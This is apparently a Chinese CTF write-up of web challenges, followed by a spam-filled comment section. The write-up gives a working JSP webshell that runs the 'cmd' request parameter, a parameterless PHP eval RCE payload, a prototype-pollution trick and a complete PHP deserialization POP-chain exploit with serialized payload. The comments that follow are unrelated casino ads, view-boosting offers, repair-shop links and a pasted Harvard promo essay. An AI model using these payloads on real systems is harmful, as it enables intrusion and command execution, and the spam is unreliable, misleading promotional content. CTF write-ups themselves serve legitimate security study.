初赛
easyjs
要有isAdmin属性
有原型链污染
污染isAdmin
{"id":"1","isAdmin":"1"}
携带note-id得到flag
hack memory
有一个上传shell的路由
写一个jsp马上传
<%
java.io.InputStream input = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int len = -1;
byte[] bytes = new byte[1024];
out.print("<pre>");
while ((len = input.read(bytes)) != -1) {
out.println(new String(bytes, "GBK"));
}
out.print("</pre>");
%>成功上传
执行命令得到flag
决赛
wucanrce
无参数rce,直接eval执行系统命令,根据提示,flag在上一级目录
/?code=eval(end(current(get_defined_vars())));&shell=system("cat /f14g.php");
unserialize
经典pop链,主要有if(md5(md5($this -> book)) == 666) 和if ($this->d[]=1)这两个判断条件要绕过
第一个条件我们直接开爆,php7里面666b134a4ac1af3a9459218f2b6bda42字符串转数字直接取前面的数字部分,得到666
<?php
//for($i = 0; $i < 10000000; $i++){
// if(md5(md5($i))==666){
// echo $i."\n";
// }
//}
echo md5(md5(170565))==666;
//1至于第二个条件,如果$a是数字,那两个赋值操作就没有成功,只会输出warning,最后返回的还是0,从而跳转到else执行eval
<?php
//highlight_file(__FILE__);
error_reporting(0);
class AAA{
public $aear;
public $string;
// public function __construct($a){
// $this -> aear = $a;
// }
function __destruct()
{
echo $this -> aear;
}
public function __toString()
{
$new = $this -> string;
return $new();
}
}
class BBB {
private $pop;
// public function __construct($string) {
// $this -> pop = $string;
// }
public function __get($value) {
$var = $this -> $value;
$var[$value]();
}
}
class DDD{
public $bag;
public $magazine;
public function __toString()
{
$length = @$this -> bag -> add();
return $length;
}
public function __set($arg1,$arg2)
{
if($this -> magazine -> tower)
{
echo "really??";
}
}
}
class EEE{
public $d=array();
public $e;
public $f;
public function __get($arg1){
$this->d[$this->e]=1;
if ($this->d[]=1){
echo 'nononononnnn!!!';
}
else{
echo $this->f;
eval($this->f);
}
}
}
class FFF{
protected $cookie;
protected function delete() {
return $this -> cookie;
}
public function __call($func, $args) {
echo 'hahahhhh';
call_user_func([$this, $func."haha"], $args);
}
}
class GGG{
public $green;
public $book;
public function __invoke(){
if(md5(md5($this -> book)) == 666) {
// system("calc");
return $this -> green -> pen;
}
}
}
$payload = new AAA();
$payload->aear=new AAA();
$payload->aear->string = new GGG();
$payload->aear->string->book=170565;
$payload->aear->string->green = new EEE();
$payload->aear->string->green->d=00000;
$payload->aear->string->green->e = 2;
$payload->aear->string->green->f = "system('cat /flag.txt');";
echo serialize($payload);
//O:3:"AAA":2:{s:4:"aear";O:3:"AAA":2:{s:4:"aear";N;s:6:"string";O:3:"GGG":2:{s:5:"green";O:3:"EEE":3:{s:1:"d";i:0;s:1:"e";i:2;s:1:"f";s:24:"system('cat /flag.txt');";}s:4:"book";i:170565;}}s:6:"string";N;}发包成功得到flag
Онлайн казино – это не только развлечения,
но и шанс выиграть крупные суммы
игровые автоматы демо 0 天前
Онлайн казино – это возможность испытать
удачу, не выходя из дома
казино Лев 昨天
Выгодные акции, постоянно обновляются!
play fortuna казино 昨天
Кто-нибудь пробовал накрутку через
телеграм-ботов?
накрутка зрителей на стрим Твич бесплатно 3 天前
Wow all kinds of helpful data!
slots jackpot online casino https://eseomail.com/betwhale-app/ best casino online germany
CasinosInopy 昨天 回复 @накрутка зрителей на стрим Твич бесплатно
Доброго дня. Наш Сервисный центр Макеевке ДНР оказываем полный спектр услуг
ремонту кофемашин Мы сделаем электроремонт
Saeco в течении нескольких часов.тел Сервисный центр
https://master.donetsk365.ru/+38(071)4753674
Mastersuirm 3 天前
Hello. . don-rem.ru
https://don-rem.ru
https://don-rem.ru zwz4967494
DoferSkelf 4 天前
Настоящий адреналин чувствуется,
когда на кону крупная сумма!
комета казино бездепозитный бонус 5 天前
Удача сегодня на моей стороне, выиграл хорошую сумму!
gorilla casino зеркало 5 天前
Пополнение моментальное, деньги приходят
сразу.
Pinco казино 5 天前
http://registr-a.ru
VanceAnync 5 天前
# Harvard University: A Legacy of Excellence and Innovation
## A Brief History of Harvard University
Founded in 1636, **Harvard University** is the oldest and one of the most prestigious higher education institutions in the United
States. Located in Cambridge, Massachusetts, Harvard has built a
global reputation for academic excellence, groundbreaking research, and influential
alumni. From its humble beginnings as a small college
established to educate clergy, it has evolved into a world-leading university that shapes the future
across various disciplines.
## Harvard’s Impact on Education and Research
Harvard is synonymous with **innovation and intellectual leadership**.
The university boasts:
- **12 degree-granting schools**, including the renowned **Harvard Business School**, **Harvard
Law School**, and **Harvard Medical School**.
- **A faculty of world-class scholars**, many of
whom are Nobel laureates, Pulitzer Prize winners, and pioneers in their fields.
- **Cutting-edge research**, with Harvard leading initiatives in artificial intelligence, public
health, climate change, and more.
Harvard’s contribution to research is immense, with billions
of dollars allocated to scientific discoveries and technological
advancements each year.
## Notable Alumni: The Leaders of Today and Tomorrow
Harvard has produced some of the **most influential figures** in history,
spanning politics, business, entertainment, and science.
Among them are:
- **Barack Obama & John F. Kennedy** – Former U.S. Presidents
- **Mark Zuckerberg & Bill Gates** – Tech visionaries (though Gates did not graduate)
- **Natalie Portman & Matt Damon** – Hollywood icons
- **Malala Yousafzai** – Nobel Prize-winning activist
The university continues to cultivate future leaders who shape industries and drive global progress.
## Harvard’s Stunning Campus and Iconic Library
Harvard’s campus is a blend of **historical charm and modern innovation**.
With over **200 buildings**, it features:
- The **Harvard Yard**, home to the iconic **John Harvard Statue** (and the famous “three lies” legend).
- The **Widener Library**, one of the largest university libraries in the world, housing **over 20 million volumes**.
- State-of-the-art research centers, museums, and performing
arts venues.
## Harvard Traditions and Student Life
Harvard offers a **rich student experience**, blending academics with vibrant traditions,
including:
- **Housing system:** Students live in one of 12 residential
houses, fostering a strong sense of community.
- **Annual Primal Scream:** A unique tradition where students de-stress
by running through Harvard Yard before finals!
- **The Harvard-Yale Game:** A historic football rivalry that unites alumni and students.
With over **450 student organizations**, Harvard students engage in a
diverse range of extracurricular activities, from entrepreneurship to performing arts.
## Harvard’s Global Influence
Beyond academics, Harvard drives change in **global policy, economics,
and technology**. The university’s research impacts healthcare,
sustainability, and artificial intelligence, with partnerships across industries worldwide.
**Harvard’s endowment**, the largest of any university, allows it to fund scholarships, research, and public initiatives, ensuring a legacy of impact for generations.
## Conclusion
Harvard University is more than just a school—it’s a **symbol of excellence, innovation, and leadership**.
Its **centuries-old traditions, groundbreaking discoveries,
and transformative education** make it one of the
most influential institutions in the world.
Whether through its distinguished alumni, pioneering research,
or vibrant student life, Harvard continues to shape the future in profound ways.
Would you like to join the ranks of Harvard’s legendary scholars?
The journey starts with a dream—and an application!
https://www.harvard.edu/ 5 天前
Hello. . don-rem.ru
https://don-rem.ru
https://don-rem.ru zwz4967494
DonrSkelf 6 天前
Hello. . donrem.ru
donrem.ru
https://donrem.ru zwz4967494
UnmerSkelf 6 天前